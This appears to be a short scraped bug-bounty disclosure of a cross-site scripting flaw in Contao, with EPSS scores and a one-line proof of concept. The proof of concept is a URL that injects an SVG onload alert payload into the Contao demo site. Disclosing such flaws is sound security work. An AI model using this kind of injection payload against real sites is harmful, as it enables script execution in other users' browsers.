Cross-site Scripting (XSS)

2022-04-2810:33:33

aggressiveuser

www.huntr.dev

0.003 Low

EPSS

Percentile

71.6%

Proof of Concept

Steps to reproduce:
Naviagate the below URL
URL: https://demo.contao.org/contao/"&gt;&lt;svg//onload=alert(112233)&gt;
Here Some Image POC Attached

Trigger

0.003 Low

EPSS

Percentile

71.6%

Related for DF46E285-1B7F-403C-8F6C-8819E42DEB80